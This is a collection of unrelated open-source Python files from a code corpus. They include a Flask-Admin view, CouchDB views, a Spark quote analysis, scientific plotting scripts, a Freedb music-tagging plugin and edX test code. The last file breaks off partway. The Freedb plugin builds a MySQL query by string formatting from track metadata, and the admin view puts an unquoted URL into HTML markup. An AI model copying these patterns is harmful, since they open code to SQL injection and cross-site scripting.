'title': '标题',
'describe': '描述',
'image': '图片链接',
'link': '链接',
'date_created': '创建时间'}
column_list = ['id', 'order', 'title', 'describe', 'image', 'link', 'date_created']
column_default_sort = ('order', True)
form_args = {
'image': {'label': '图片', 'validators': [validators.Required(),
validators.URL()]},
'link': {'label': '链接', 'validators': [validators.Required(),
validators.URL()]},
}
def _show_image(self, context, model, name):
image = model.image.strip() if model.image else ''
return Markup('<img src=%s width=200 height=200 />' % image)
column_formatters = {
'image': _show_image,
}
def __init__(self, **kwargs):
super(Slide, self).__init__(SlideModel, db.session, **kwargs)
def create_form(self, obj=None):
form = super(Slide, self).create_form()
delattr(form, 'date_created')
return form
def edit_form(self, obj=None):
form = super(Slide, self).edit_form(obj=obj)
delattr(form, 'date_created')
return form
|
qisanstudio/qsapp-suibe
|
src/suibe/panel/article.py
|
Python
|
mit
| 2,836 | 0.000724 |
# -*- coding: utf-8 -*-
import mock
import pytest
from future.moves.urllib.parse import urlparse, urljoin
from addons.base.tests import views
from addons.base.tests.utils import MockFolder
from addons.mendeley.models import Mendeley
from addons.mendeley.tests.utils import MendeleyTestCase, mock_responses
from tests.base import OsfTestCase
from addons.mendeley.provider import MendeleyCitationsProvider
from addons.mendeley.serializer import MendeleySerializer
API_URL = 'https://api.mendeley.com'
pytestmark = pytest.mark.django_db
class TestAuthViews(MendeleyTestCase, views.OAuthAddonAuthViewsTestCaseMixin, OsfTestCase):
pass
class TestConfigViews(MendeleyTestCase, views.OAuthCitationAddonConfigViewsTestCaseMixin, OsfTestCase):
folder = MockFolder()
Serializer = MendeleySerializer
client = Mendeley
citationsProvider = MendeleyCitationsProvider
foldersApiUrl = urljoin(API_URL, 'folders')
documentsApiUrl = urljoin(API_URL, 'documents')
mockResponses = mock_responses
@mock.patch('addons.mendeley.models.NodeSettings._fetch_folder_name', mock.PropertyMock(return_value='Fake Name'))
def test_deauthorize_node(self):
super(TestConfigViews, self).test_deauthorize_node()
|
Johnetordoff/osf.io
|
addons/mendeley/tests/test_views.py
|
Python
|
apache-2.0
| 1,232 | 0.004058 |
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Visualize the system cells and MPI domains. Run ESPResSo in parallel
to color particles by node. With OpenMPI, this can be achieved using
``mpiexec -n 4 ./pypresso ../samples/visualization_cellsystem.py``.
Set property ``system.cell_system.node_grid = [i, j, k]`` (with ``i * j * k``
equal to the number of MPI ranks) to change the way the cellsystem is
partitioned. Only the domain of MPI rank 0 will be shown in wireframe.
"""
import espressomd
import espressomd.visualization_opengl
import numpy as np
required_features = ["LENNARD_JONES"]
espressomd.assert_features(required_features)
box = [40, 30, 20]
system = espressomd.System(box_l=box)
visualizer = espressomd.visualization_opengl.openGLLive(
system,
window_size=[800, 800],
background_color=[0, 0, 0],
camera_position=[20, 15, 80],
particle_coloring='node',
draw_nodes=True,
draw_cells=True)
system.time_step = 0.0005
system.cell_system.set_regular_decomposition(use_verlet_lists=True)
system.cell_system.skin = 0.4
#system.cell_system.node_grid = [i, j, k]
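# Place 100 particles at uniformly random positions inside the box.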
for i in range(100):
system.part.add(pos=box * np.random.random(3))
system.non_bonded_inter[0, 0].lennard_jones.set_params(
epsilon=100.0, sigma=1.0, cutoff=3.0, shift="auto")
energy = system.analysis.energy()
print(f"Before Minimization: E_total = {energy['total']:.2e}")
system.integrator.set_steepest_descent(f_max=50, gamma=30.0,
max_displacement=0.001)
system.integrator.run(10000)
system.integrator.set_vv()
energy = system.analysis.energy()
print(f"After Minimization: E_total = {energy['total']:.2e}")
print("Tune skin")
system.cell_system.tune_skin(0.1, 4.0, 1e-1, 1000)
print(system.cell_system.get_state())
system.thermostat.set_langevin(kT=1, gamma=1, seed=42)
visualizer.run(1)
|
espressomd/espresso
|
samples/visualization_cellsystem.py
|
Python
|
gpl-3.0
| 2,509 | 0.000399 |
# -*- coding: utf-8 -*-
"""
################################################
Plataforma ActivUFRJ
################################################
:Author: *Núcleo de Computação Eletrônica (NCE/UFRJ)*
:Contact: carlo@nce.ufrj.br
:Date: $Date: 2009-2010 $
:Status: This is a "work in progress"
:Revision: $Revision: 0.01 $
:Home: `LABASE `__
:Copyright: ©2009, `GPL
"""
from couchdb.design import ViewDefinition
import core.database
################################################
# CouchDB Permanent Views
################################################
# Returns the list of questions used in a quiz, with all additional information
#
# Usage: database.ACTIVDB.view('activity/by_group',startkey=[registry_id],endkey=[id, {}, {}])
activity_by_group = ViewDefinition('activity', 'by_group', \
'''
function(doc) {
if (doc.type=="activity") {
emit([doc.registry_id, doc.group_id, doc.status], 1);
}
}
''',
u'''
function(keys, values) {
return sum(values);
}
''')
# Returns the list of questions used in a quiz, with all additional information
#
# Usage: database.ACTIVDB.view('activity/finalized',startkey=[registry_id],endkey=[id, {}, {}])
activity_finalized_and_groups = ViewDefinition('activity', 'finalized_and_groups', \
'''
function(doc) {
if (doc.type=="activity" && doc.status == "finalizado") {
emit([doc.registry_id, doc.group_id, doc.data_cri, 1], doc);
}
if (doc.type=="group" ) {
emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
}
}
''')
# Returns the list of questions used in a quiz, without the group information
#
# Usage: database.ACTIVDB.view('activity/finalized',startkey=[registry_id],endkey=[id, {}, {}])
activity_list_by_registry = ViewDefinition('activity', 'list_by_registry', \
'''
function (doc) {
if (doc.type=="activity" ) {
emit([doc.registry_id, doc.group_id, doc.data_cri,1], doc);
}
if (doc.type=="group") {
emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
}
}
''')
# Returns the list of questions used in a quiz, with all additional information
#
# Usage: database.ACTIVDB.view('activity/finalized',startkey=[registry_id],endkey=[id, {}, {}])
activity_Nfinalized = ViewDefinition('activity', 'Nfinalized', \
'''
function(doc) {if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
emit([doc.registry_id, doc.group_id, doc.data_cri, 1], doc);
}
if (doc.type=="group" ) {
emit([doc.registry_id, doc._id, doc.data_cri, 0], doc);
}
}
''')
activity_pendent = ViewDefinition('activity', 'pendent', \
'''
function(doc) {
if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
for (e in doc.encarregados){
emit([doc.encarregados[e], doc.registry_id, doc.data_cri, 1], doc);
}
}
if (doc.type=="activity" && (!(doc.status == "finalizado"))) {
for (e in doc.encarregados){
emit([doc.encarregados[e], doc.registry_id, doc.data_cri, 0], doc.group_id);
}
}
}
''',)
ViewDefinition.sync_many(core.database.ACTIVDB, [
activity_by_group, \
activity_Nfinalized, \
activity_pendent, \
activity_finalized_and_groups, \
activity_list_by_registry \
])
|
labase/activnce
|
main/activity/database.py
|
Python
|
gpl-2.0
| 5,622 | 0.012132 |
# encoding: utf-8
from setuptools import setup, find_packages
import toasyncio
setup(
name='toasyncio',
packages=find_packages(exclude=['tests']),
install_requires=(
'tornado>=4.2',
'asyncio',
),
author=toasyncio.__author__,
version=toasyncio.__version__,
author_email=", ".join("{email}".format(**a) for a in toasyncio.author_info),
long_description=open('README.rst', 'r').read(),
license='MIT',
keywords=(
"tornado",
"asyncio",
),
url='https://github.com/mosquito/toasyncio',
description='Transparent convert any asyncio futures and inline yield methods to tornado futures.',
zip_safe=False,
classifiers=[
'Environment :: Console',
'Programming Language :: Python :: 3 :: Only',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
)
|
alternativehood/toasyncio
|
setup.py
|
Python
|
mit
| 897 | 0.003344 |
# Project : Dlab-Finance
# W251 Nital Patwa and Ritesh Soni
# Desc : This program counts, for each exchange, the number of times it produced the best bid (or ask) and the average size of the bid (or ask)
# The purpose is to understand what roles exchanges such as BATS play.
# Usage Instructions
# Change inputDir for daily quote file and outputDir for location of output
# ./submit.sh 4 8G nbboex.py
#              ^ number of nodes
'''
fields of dailyquotes file taqquote
[0:8]HHMMSSXXX
[9] text EXCHANGE N Nyse T/Q NASDAQ
[10:25] text symbol 6+10
[26:36] bid price 7+4
[37:43] bid size (units)
[44:54] ask price 7+4
[55:61] ask size
[62] text Condition of quote
[63:66] market maker
[67] bid exchange
[68] ask aexchange
[69:84] int seqno
[85] int bbo indicator
[86] int NASDAQ BBO indocator
[87] text cancel/correction A=Normal B=Cancel C=Corrected-price
[88] text C=CTA N=UTP
[90] text Retail interest indicator
[...]
'''
import sys
from random import random
from operator import add
from pyspark import SparkContext, SparkConf
inputDir="/global/scratch/npatwa/sparkinput/taqquote20100505"
outputDir="/global/scratch/npatwa/sparkoutput/nbboexsize20100505/"
def processquote (record):
# Sort by index created using zipWithIndex to preserve ordering in tied timestamps
listOrig = sorted(record[1])
list1 = [rec for rec in listOrig if ((int(rec[1]) >= 93000000) and (int(rec[1]) <= 160000000))] # filter the list for regular stock hours
# Setup exchangeList for NBBO calculation
exchangeList = ['A','B','C','D','I','J','K','M','N','T','P','S','Q','W','X','Y','Z']
bidList = [0]*len(exchangeList)
bidSize = [0]*len(exchangeList)
askList = [sys.maxsize]*len(exchangeList)
askSize = [0]*len(exchangeList)
nbboList=[]
bbExCnt = [0]*len(exchangeList)
baExCnt = [0]*len(exchangeList)
bbExSize = [0]*len(exchangeList)
baExSize = [0]*len(exchangeList)
currtime=0
# Iterate over the list to calculate nbbo
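    # Whenever the millisecond timestamp changes, credit the exchange that held the
    # best bid/ask during the previous millisecond and accumulate its quoted size.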
for i in range(len(list1)):
if (currtime != int(list1[i][1])): # change of millisecond
# Find NBBO and exchange count
if (max(bidList) > 0) or (min(askList) < sys.maxsize):
# Output key Value pairs where
# Key : (<Stock Ticker>, <Time in ms seconds>)
# Value : (<best-bid>,<best-bid-exchange>,<best-bid-size>, <best-ask>,<best-ask-exchange>,<best-ask-size> )
maxbid = max(bidList)
minask = min(askList)
bbEx = bidList.index(maxbid) #index of exchange showing max bid
baEx = askList.index(minask) #index of exchange showing min ask
bbSize = bidSize[bbEx] #size
baSize = askSize[baEx] #size
bbExCnt[bbEx] += 1
baExCnt[baEx] += 1
bbExSize[bbEx] += bbSize
                baExSize[baEx] += baSize
currtime=int(list1[i][1])
# set the latest bid and ask if bid & ask are not zero and if bidsize and asksize are not zero
# Backout the bid or ask if either is 0
if ((list1[i][2] != 0) & (list1[i][3] != 0)):
bidList[exchangeList.index(list1[i][6])] = list1[i][2]
bidSize[exchangeList.index(list1[i][6])] = list1[i][3]
elif ((list1[i][2] == 0) or (list1[i][8] == 'B')):
bidList[exchangeList.index(list1[i][6])] = 0
bidSize[exchangeList.index(list1[i][6])] = 0 # size
if ((list1[i][4] != 0) & (list1[i][5] != 0)):
askList[exchangeList.index(list1[i][7])] = list1[i][4]
askSize[exchangeList.index(list1[i][7])] = list1[i][5]
elif ((list1[i][4] == 0) or (list1[i][8] == 'B')):
askList[exchangeList.index(list1[i][7])] = sys.maxsize
askSize[exchangeList.index(list1[i][7])] = 0
for j in range(len(exchangeList)):
if (bbExCnt[j] > 0):
bbExSize[j] = bbExSize[j]/bbExCnt[j]
if (baExCnt[j] > 0):
baExSize[j] = baExSize[j]/baExCnt[j]
nbboList.append((record[0],(bbExCnt, bbExSize, baExCnt, baExSize)))
return nbboList
if __name__ == "__main__":
conf = SparkConf().setAppName("nbbo_hfalert")
sc = SparkContext(conf=conf)
data1 = sc.textFile(inputDir)
data2 = data1.zipWithIndex()
data3 = data2.map(lambda rec: (rec[0][10:26].strip(),
(rec[1], #index
rec[0][0:9], #ms time
float(rec[0][26:37])/10000, #bid price
int(rec[0][37:44]), #bid size
float(rec[0][44:55])/10000, #ask price
int(rec[0][55:62]), #ask size
rec[0][67], #bid exchange
rec[0][68], #ask exchange
rec[0][87]))).groupByKey() #cancel or correction
result = data3.flatMap(lambda records: processquote(records)).map(lambda rec: [rec[0], rec[1][0], rec[1][1], rec[1][2], rec[1][3]])
result.saveAsTextFile(outputDir)
|
rdhyee/dlab-finance
|
crossings/nbboex.py
|
Python
|
isc
| 5,138 | 0.011872 |
# Now make a simple example using the custom projection.
import pdb
import sys
import os
import pkg_resources
pkg_resources.require('matplotlib==1.4.0')
import datetime
from dateutil.relativedelta import relativedelta
import re
import math
from matplotlib.ticker import ScalarFormatter, MultipleLocator
from matplotlib.collections import LineCollection
import matplotlib.pyplot as plt
from StringIO import StringIO
import numpy as np
from numpy import load
# Exception handling, with line number and stuff
import linecache
import sys
def PrintException():
exc_type, exc_obj, tb = sys.exc_info()
f = tb.tb_frame
lineno = tb.tb_lineno
filename = f.f_code.co_filename
linecache.checkcache(filename)
line = linecache.getline(filename, lineno, f.f_globals)
print 'EXCEPTION IN ({}, LINE {} "{}"): {}'.format(filename, lineno, line.strip(), exc_obj)
import imp
imp.load_source('SoundingRoutines', '/nfs/see-fs-01_users/eepdw/python_scripts/Tephigram/Sounding_Routines.py')
imp.load_source('TephigramPlot', '/nfs/see-fs-01_users/eepdw/python_scripts/Tephigram/Tephigram_Functions.py')
from TephigramPlot import *
from SoundingRoutines import *
imp.load_source('GeogFuncs', '/nfs/see-fs-01_users/eepdw/python_scripts/modules/GeogFunctions.py')
from GeogFuncs import *
pmin=200.
station_list_cs=[42182, 43003, 43014, 42867, 43371, 43353, 43285, 43192, 43150, 42339, 40990, 40948]
#station_list_cs=[43003]
date_min=datetime.datetime(1960,5,1,0,0,0)
date_max=datetime.datetime(2014,10,1,0,0,0)
delta = relativedelta(weeks=+1)
variable_list={'pressures': 0, 'temps':1, 'dewpoints':2, 'winddirs':3, 'windspeeds':4, 'pot_temp':5,
'sat_vap_pres':6, 'vap_press':7, 'rel_hum':8, 'wvmr':9, 'sp_hum':10, 'sat_temp':11,
'theta_e':12, 'theta_e_sat':13, 'theta_e_minus_theta_e_sat':14}
variable_list_line={'lcl_temp': 0, 'lcl_vpt':1, 'pbl_pressure':2, 'surface_pressure':3, 'T_eq_0':4}
def variable_name_index_match(variable, variable_list):
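    # Look up the array index whose key both starts and ends with the given variable name.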
for key, value in variable_list.iteritems(): # iter on both keys and values
if key.startswith('%s' % variable) and key.endswith('%s' % variable):
arr_index_var=value
return arr_index_var
# Parse the data
for stat in station_list_cs:
station_name,la,lo, st_height=StationInfoSearch(stat)
load_file = load('/nfs/a90/eepdw/Data/Observations/Radiosonde_Numpy/Radiosonde_Cross_Section_'
'IND_SOUNDING_INTERP_MEAN_Climat_%s_%s_%s_%s.npz'
% (date_min.strftime('%Y%m%d'), date_max.strftime('%Y%m%d'), delta, stat))
data=load_file['date_bin_mean_all_dates_one_station']
dates=load_file['dates_for_plotting']
for bin in range(data.shape[0]):
try:
p=data[bin,0,:]/100
T=data[bin,1,:]-273.15
Td=T-data[bin,2,:]
h=data[bin,15,:]
da=dates[bin]
#print T
#print p
#print Td
#pdb.set_trace()
#u_wind,v_wind = u_v_winds(data[bin,3,:], data[bin,4,:])
u_wind,v_wind = data[bin,-2,:], data[bin,-1,:]
# Create a new figure. The dimensions here give a good aspect ratio
fig = plt.figure(figsize=(10, 8), frameon=False)
#fig.patch.set_visible(False)
tephigram_plot_height=0.85
tephigram_plot_bottom=.085
ax = fig.add_axes([.085,tephigram_plot_bottom,.65,tephigram_plot_height], projection='skewx', frameon=False, axisbg='w')
ax.set_yscale('log')
plt.grid(True)
#pdb.set_trace()
tmax=math.ceil(nanmax(T)/10)*10
tmin=math.floor(nanmin(Td[p>400])/10)*10
pmax=math.ceil(nanmax(p)/50)*50
P=linspace(pmax,pmin,37)
w = array([0.0001,0.0004,0.001, 0.002, 0.004, 0.007, 0.01, 0.016, 0.024, 0.032, 0.064, 0.128])
ax.add_mixratio_isopleths(w,linspace(pmax, 700., 37),color='m',ls='-',alpha=.5,lw=0.5)
ax.add_dry_adiabats(linspace(-40,40,9),P,color='k',ls='-',alpha=.5,lw=0.8)
ax.add_moist_adiabats(linspace(-40,40,18),P,color='k',ls='--',alpha=.5,lw=0.8, do_labels=False)
ax.other_housekeeping(pmax, pmin, 40,-40)
wbax = fig.add_axes([0.75,tephigram_plot_bottom,0.12,tephigram_plot_height],frameon=False, sharey=ax, label='barbs')
ax_text_box = fig.add_axes([0.85,0.085,.12,tephigram_plot_height], frameon=False, axisbg='w')
# Plot the data using normal plotting functions, in this case using semilogy
ax.semilogy(T, p, 'r', linewidth=2)
ax.semilogy(Td, p, 'r',linewidth=2)
# row_labels=(
# 'SLAT',
# 'SLON',
# 'SELV',
# 'SHOW',
# 'LIFT',
# 'LFTV',
# 'SWET',
# 'KINX',
# 'CTOT',
# 'VTOT',
# 'TOTL',
# 'CAPE',
# 'CINS',
# 'CAPV',
# 'CINV',
# 'LFCT',
# 'LFCV',
# 'BRCH',
# 'BRCV',
# 'LCLT',
# 'LCLP',
# 'MLTH',
# 'MLMR',
# 'THCK',
# 'PWAT')
# variable='pbl_pressure'
# var_index = variable_name_index_match(variable, variable_list_line)
# print load_file['date_bin_mean_all_dates_one_station_single'].shape
# pbl_pressure = load_file['date_bin_mean_all_dates_one_station_single'][bin,0,var_index]
# print pbl_pressure
# EQLV, pp, lclp,lfcp, lclt, delta_z, CAPE, CIN=CapeCinPBLInput(p, T, Td, h, st_height, pbl_pressure/100)
# print lclp
# table_vals=(
# #'%s' % station_name,
# #'Climatology - Week beg. %s' % da,
# '%s' % la,
# '%s' % lo,
# '%s' % st_height,
# '%.1f' % ShowalterIndex(T, Td, p), # ['Showalter index',
# '%.1f' % LiftedIndex(T, Td, p, h, st_height), # 'Lifted index',
# '--', # 'LIFT computed using virtual temperature',
# '--', # 'SWEAT index',
# '%.1f' % KIndex(T, Td, p), # 'K index',
# '%.1f' % CrossTotalsIndex(T, Td, p), # 'Cross totals index',
# '%.1f' % VerticalTotalsIndex(T, p), # 'Vertical totals index',
# '%.1f' % TotalTotalsIndex(T, Td, p), # 'Total totals index',
# '%.1f' % CAPE, # 'CAPE',
# '%.1f' % CIN, # 'CIN',
# '--', # 'CAPE using virtual temperature',
# '--', # 'CINS using virtual temperature',
# '%.1f' % lfcp, # 'Level of free convection',
# '--', # 'LFCT using virtual temperature',
# '--' , # 'Bulk Richardson number',
# '--', # 'Bulk richardson using CAPV',
# '%.1f' % lclt, # 'Temp [K] of the Lifted Condensation Level',
# '%.1f' % lclp , # 'Pres [hPa] of the Lifted Condensation Level',
# '--', # 'Mean mixed layer potential temperature',
# '--', # 'Mean mixed layer mixing ratio',
# '--', # '1000 hPa to 500 hPa thickness',
# '--') # 'Precipitable water [mm] for entire sounding']
# Wind barbs
barbs_idx=np.logspace(np.log10(10),np.log10(max(len(u_wind))),num=32).astype(int)
wbax.set_yscale('log')
wbax.xaxis.set_ticks([],[])
wbax.yaxis.grid(True,ls='-',color='y',lw=0.5)
wbax.set_xlim(-1.5,1.5)
wbax.get_yaxis().set_visible(False)
wbax.set_ylim(pmax+100,pmin)
wbax.barbs((zeros(p.shape))[barbs_idx-1],p[barbs_idx-1], u_wind[barbs_idx-1], v_wind[barbs_idx-1])
# Disables the log-formatting that comes with semilogy
ax.yaxis.set_major_formatter(ScalarFormatter())
ax.set_yticks(linspace(100,1000,10))
ax.set_ylim(pmax,pmin)
ax.set_xlim(-40.,40.)
ax.xaxis.set_ticks([],[])
ax_text_box.xaxis.set_visible(False)
ax_text_box.yaxis.set_visible(False)
for tick in wbax.yaxis.get_major_ticks():
# tick.label1On = False
pass
#wbax.get_yaxis().set_tick_params(size=0,color='y')
# y_loc=1.
# max_string_length = max([len(line) for line in row_labels])
# for t,r in zip(row_labels,table_vals):
# label_rightjust=('{:>%i}' % max_string_length).format(t)
# ax_text_box.text(0.5, y_loc, ' %s:' % (label_rightjust), size=8, horizontalalignment='right')
# ax_text_box.text(0.5, y_loc, ' %s' % (r), size=8, horizontalalignment='left')
# y_loc-=0.04
fig.text(.02,0.965, '%s %s' %(stat, station_name), size=12, horizontalalignment='left')
fig.text(.02,0.035, 'Climatology - Week beg. %s ' %(da.strftime('%m-%d')), size=12, horizontalalignment='left')
#plt.show()
plt.savefig('/nfs/a90/eepdw/Figures/Radiosonde/Tephigrams/Weekly_Climatology/Weekly_Climatology_%s_%s_%s_Skew_T.png' % (station_name.replace('/','_').replace(' ', '_'), stat, da.strftime('%Y%m%d')))
plt.close()
except Exception:
        PrintException()
|
peterwilletts24/Python-Scripts
|
Tephigram/Tephigrams_From_Radiosonde_Climatology_Onset.py
|
Python
|
mit
| 11,003 | 0.020813 |
from __future__ import absolute_import
from changes.api.base import APIView
from changes.models import Task
class TaskIndexAPIView(APIView):
def get(self):
queryset = Task.query.order_by(Task.date_created.desc())
return self.paginate(queryset)
|
bowlofstew/changes
|
changes/api/task_index.py
|
Python
|
apache-2.0
| 268 | 0 |
#!/usr/bin/env python
# vi:ai:et:ts=4 sw=4
#
# -*- coding: utf8 -*-
#
# PyMmr My Music Renamer
# Copyright (C) 2007-2010 mathgl67@gmail.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from mmr.plugin import AbstractResearchPlugin
from mmr.album import Album
from mmr.abstract_investigate import AbstractInvestigate
class Freedb(AbstractResearchPlugin):
def setup(self):
self.investigate_class = FreedbInvestigate
self.about = {
"name": u"Freedb",
"short_description": u"",
"long_description": u"",
}
self.priority = 5
def available(self):
try:
import MySQLdb
except ImportError as exception:
return False
return True
plugin_class=Freedb
class FreedbInvestigate(AbstractInvestigate):
def _set_up_(self):
import MySQLdb
self.db = MySQLdb.connect(
host=self._config_['host'],
user=self._config_['user'],
passwd=self._config_['password'],
db=self._config_['db']
)
self.db.set_character_set("utf8")
self._album_ = Album('freedb', self._base_score_)
def do_album(self):
for res in self._album_list_:
if res.artist and res.album:
artist = res.artist.encode("UTF-8")
album = res.album.encode("UTF-8")
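                # Artist/album values are interpolated straight into the LIKE clause
                # (no parameter binding); MySQLdb parameter escaping would be safer here.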
self.db.query("""
SELECT genre, year FROM album WHERE artist LIKE "%s" AND title LIKE "%s"
""" % ( artist, album ))
r = self.db.store_result()
for (genre, year) in r.fetch_row(0):
self._album_.artist = res.artist
self._album_.album = res.album
self._album_.genre = unicode(genre, "UTF-8")
self._album_.year = unicode(str(year), "UTF-8")
return self._album_
def do_track(self, file_obj, result_array):
return None
|
mathgl67/pymmr
|
mmr/plugins/research/freedb.py
|
Python
|
gpl-2.0
| 2,675 | 0.003364 |
# -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Nicolas Duhamel
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from .login import (
LoginPage, Initident, CheckPassword, repositionnerCheminCourant,
BadLoginPage, AccountDesactivate, UnavailablePage,
Validated2FAPage, TwoFAPage, SmsPage, DecoupledPage,
)
from .accountlist import AccountList, AccountRIB, Advisor, RevolvingAttributesPage
from .accounthistory import AccountHistory, CardsList
from .transfer import TransferChooseAccounts, CompleteTransfer, TransferConfirm, TransferSummary, CreateRecipient, ValidateRecipient,\
ValidateCountry, ConfirmPage, RcptSummary
from .subscription import SubscriptionPage, DownloadPage, ProSubscriptionPage
__all__ = ['LoginPage', 'Initident', 'CheckPassword', 'repositionnerCheminCourant', "AccountList", 'AccountHistory', 'BadLoginPage',
'AccountDesactivate', 'TransferChooseAccounts', 'CompleteTransfer', 'TransferConfirm', 'TransferSummary', 'UnavailablePage',
'CardsList', 'AccountRIB', 'Advisor', 'CreateRecipient', 'ValidateRecipient', 'ValidateCountry', 'ConfirmPage', 'RcptSummary',
'SubscriptionPage', 'DownloadPage', 'ProSubscriptionPage', 'RevolvingAttributesPage', 'Validated2FAPage', 'TwoFAPage',
'SmsPage', 'DecoupledPage', ]
|
laurentb/weboob
|
modules/bp/pages/__init__.py
|
Python
|
lgpl-3.0
| 1,981 | 0.003029 |
"""
Tests for users API
"""
import datetime
import ddt
import pytz
from django.conf import settings
from django.template import defaultfilters
from django.test import RequestFactory, override_settings
from django.utils import timezone
from milestones.tests.utils import MilestonesTestCaseMixin
from mock import patch
from lms.djangoapps.certificates.api import generate_user_certificates
from lms.djangoapps.certificates.models import CertificateStatuses
from lms.djangoapps.certificates.tests.factories import GeneratedCertificateFactory
from course_modes.models import CourseMode
from courseware.access_response import MilestoneAccessError, StartDateError, VisibilityError
from lms.djangoapps.grades.tests.utils import mock_passing_grade
from mobile_api.testutils import (
MobileAPITestCase,
MobileAuthTestMixin,
MobileAuthUserTestMixin,
MobileCourseAccessTestMixin
)
from openedx.core.lib.courses import course_image_url
from openedx.core.lib.tests import attr
from student.models import CourseEnrollment
from util.milestones_helpers import set_prerequisite_courses
from util.testing import UrlResetMixin
from xmodule.course_module import DEFAULT_START_DATE
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from .. import errors
from .serializers import CourseEnrollmentSerializer
@attr(shard=9)
class TestUserDetailApi(MobileAPITestCase, MobileAuthUserTestMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>...
"""
REVERSE_INFO = {'name': 'user-detail', 'params': ['username']}
def test_success(self):
self.login()
response = self.api_response()
self.assertEqual(response.data['username'], self.user.username)
self.assertEqual(response.data['email'], self.user.email)
@attr(shard=9)
class TestUserInfoApi(MobileAPITestCase, MobileAuthTestMixin):
"""
Tests for /api/mobile/v0.5/my_user_info
"""
def reverse_url(self, reverse_args=None, **kwargs):
return '/api/mobile/v0.5/my_user_info'
def test_success(self):
"""Verify the endpoint redirects to the user detail endpoint"""
self.login()
response = self.api_response(expected_response_code=302)
self.assertIn(self.username, response['location'])
@attr(shard=9)
@ddt.ddt
@override_settings(MKTG_URLS={'ROOT': 'dummy-root'})
class TestUserEnrollmentApi(UrlResetMixin, MobileAPITestCase, MobileAuthUserTestMixin,
MobileCourseAccessTestMixin, MilestonesTestCaseMixin):
"""
Tests for /api/mobile/v0.5/users/<user_name>/course_enrollments/
"""
REVERSE_INFO = {'name': 'courseenrollment-detail', 'params': ['username']}
ALLOW_ACCESS_TO_UNRELEASED_COURSE = True
ALLOW_ACCESS_TO_MILESTONE_COURSE = True
ALLOW_ACCESS_TO_NON_VISIBLE_COURSE = True
NEXT_WEEK = datetime.datetime.now(pytz.UTC) + datetime.timedelta(days=7)
LAST_WEEK = datetime.datetime.now(pytz.UTC) - datetime.timedelta(days=7)
ADVERTISED_START = "Spring 2016"
ENABLED_SIGNALS = ['course_published']
DATES = {
'next_week': NEXT_WEEK,
'last_week': LAST_WEEK,
'default_start_date': DEFAULT_START_DATE,
}
@patch.dict(settings.FEATURES, {"ENABLE_DISCUSSION_SERVICE": True})
def setUp(self):
super(TestUserEnrollmentApi, self).setUp()
def verify_success(self, response):
"""
Verifies user course enrollment response for success
"""
super(TestUserEnrollmentApi, self).verify_success(response)
courses = response.data
self.assertEqual(len(courses), 1)
found_course = courses[0]['course']
self.assertIn('courses/{}/about'.format(self.course.id), found_course['course_about'])
self.assertIn('course_info/{}/updates'.format(self.course.id), found_course['course_updates'])
self.assertIn('course_info/{}/handouts'.format(self.course.id), found_course['course_handouts'])
self.assertIn('video_outlines/courses/{}'.format(self.course.id), found_course['video_outline'])
self.assertEqual(found_course['id'], unicode(self.course.id))
self.assertEqual(courses[0]['mode'], CourseMode.DEFAULT_MODE_SLUG)
self.assertEqual(courses[0]['course']['subscription_id'], self.course.clean_id(padding_char='_'))
expected_course_image_url = course_image_url(self.course)
self.assertIsNotNone(expected_course_image_url)
self.assertIn(expected_course_image_url, found_course['course_image'])
self.assertIn(expected_course_image_url, found_course['media']['course_image']['uri'])
def verify_failure(self, response, error_type=None):
self.assertEqual(response.status_code, 200)
courses = response.data
self.assertEqual(len(courses), 0)
@patch.dict(settings.FEATURES, {'ENABLE_MKTG_SITE': True})
def test_sort_order(self):
self.login()
num_courses = 3
courses = []
for course_index in range(num_courses):
courses.append(CourseFactory.create(mobile_available=True))
self.enroll(courses[course_index].id)
# verify courses are returned in the order of enrollment, with most recently enrolled first.
response = self.api_response()
for course_index in range(num_courses):
self.assertEqual(
response.data[course_index]['course']['id'],
unicode(courses[num_courses - course_index - 1].id)
)
@patch.dict(settings.FEATURES, {
'ENABLE_PREREQUISITE_COURSES': True,
'DISABLE_START_DATES': False,
'ENABLE_MKTG_SITE': True,
})
def test_courseware_access(self):
self.login()
course_with_prereq = CourseFactory.create(start=self.LAST_WEEK, mobile_available=True)
prerequisite_course = CourseFactory.create()
set_prerequisite_courses(course_with_prereq.id, [unicode(prerequisite_course.id)])
# Create list of courses with various expected courseware_access responses and corresponding expected codes
courses = [
course_with_prereq,
CourseFactory.create(start=self.NEXT_WEEK, mobile_available=True),
CourseFactory.create(visible_to_staff_only=True, mobile_available=True),
CourseFactory.create(start=self.LAST_WEEK, mobile_available=True, visible_to_staff_only=False),
]
expected_error_codes = [
